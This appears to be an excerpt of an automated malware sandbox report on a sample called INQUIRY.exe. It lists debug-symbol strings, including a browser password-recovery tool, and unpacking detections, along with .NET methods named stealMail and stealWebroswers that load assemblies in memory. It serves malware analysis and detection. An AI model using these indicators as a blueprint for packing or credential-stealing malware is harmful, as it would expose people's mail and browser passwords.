                    Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winhttp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorsec.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmiutils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorwks.pdb% source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbH source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: rtutils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.698202871.0000000002BC1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776011928.0000000002E7E000.00000004.00000001.sdmp
                    Source: Binary string: mscorwks.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: oleaut32.pdb8hUi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\binaries.x86ret\bin\i386\Microsoft.VisualBasic.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorjit.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: shfolder.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: culture.pdbe source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: WMINet_Utils.pdb_ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasman.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: fastprox.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemsvc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winrnr.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: System.Runtime.Remoting.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: version.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wintrust.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorrc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb- source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmiutils.pdbbi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: psapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: WMINet_Utils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdbS source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdbee-c source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.699952597.0000000002BCD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776039564.0000000002E8A000.00000004.00000001.sdmp
                    Source: Binary string: tsymbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: combase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc.pdbThqia source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: 1_oC:\Windows\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: culture.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: crypt32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cfgmgr32.pdb; source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: edputil.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp

                    Data Obfuscation:

                    barindex
                    Detected unpacking (changes PE section rights)Show sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 1.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 16.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 28.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 33.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 1.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 16.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 28.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 33.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Detected unpacking (creates a PE file in dynamic memory)Show sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 1.2.INQUIRY.exe.2300000.3.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 16.2.INQUIRY.exe.2490000.3.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 33.2.INQUIRY.exe.2380000.3.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 1.2.INQUIRY.exe.2300000.3.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 16.2.INQUIRY.exe.2490000.3.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 33.2.INQUIRY.exe.2380000.3.unpack
                    Detected unpacking (overwrites its own PE header)Show sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 1.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 16.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 28.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 33.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 1.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 16.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 28.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exeUnpacked PE file: 33.2.INQUIRY.exe.400000.0.unpack
                    .NET source code contains potential unpackerShow sources
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
